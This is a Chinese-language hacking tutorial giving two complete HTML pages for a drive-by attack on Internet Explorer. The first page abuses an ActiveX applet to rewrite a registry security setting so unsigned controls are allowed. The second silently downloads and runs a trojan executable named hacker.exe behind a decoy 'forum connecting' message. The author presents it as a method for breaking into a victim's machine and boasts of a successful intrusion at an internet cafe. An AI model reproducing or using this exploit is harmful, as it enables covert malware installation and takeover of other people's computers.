具体方法如下：
开启第一个HTML的页面，通过恶意的HTML代码把IE安全级别里的默认的“禁用下栽未签名的ActiveX控件”选项，变为“启用下栽未签名的ActiveX控件”，然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件，实质就是我们所要执行的EXE文件。
将如下代码保存为index.htm文件：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<CNTER><HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>

<script language="javascript">
<!-- Begin
function opencolortext(){
window.open(’http://xxx.abc.com/2.htm’,’colortext’)
}
setTimeout("opencolortext()",1500)
// End -->
</script>
</BODY></HTML>

下面制作2.htm文件：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"hacker.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<p align="center">论坛连接中请勿终断....
<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>

其中hacker.exe就是我们要执行的文件。至于那个“论坛连接中请勿终断....”完全是为了迷惑对方，可根据自己喜好而定。接下来只要将index.htm，2.htm和hacker.exe一起上传到主页的同一目录中就ok了！
总结：这个方法的好处是，如果对方在局域网内，我们同样可以用木马进入他的机器并且很难发现。但这个方法也有自己的缺点，那就是用了两种木马，大大的增大了被杀毒软件查杀的几率。不过对方是在网吧中，而我们这里的网吧大多又不安装杀毒软件（用硬盘还原卡代替），并且不升级IE，我这次入侵成功，网吧老板也有一份功劳！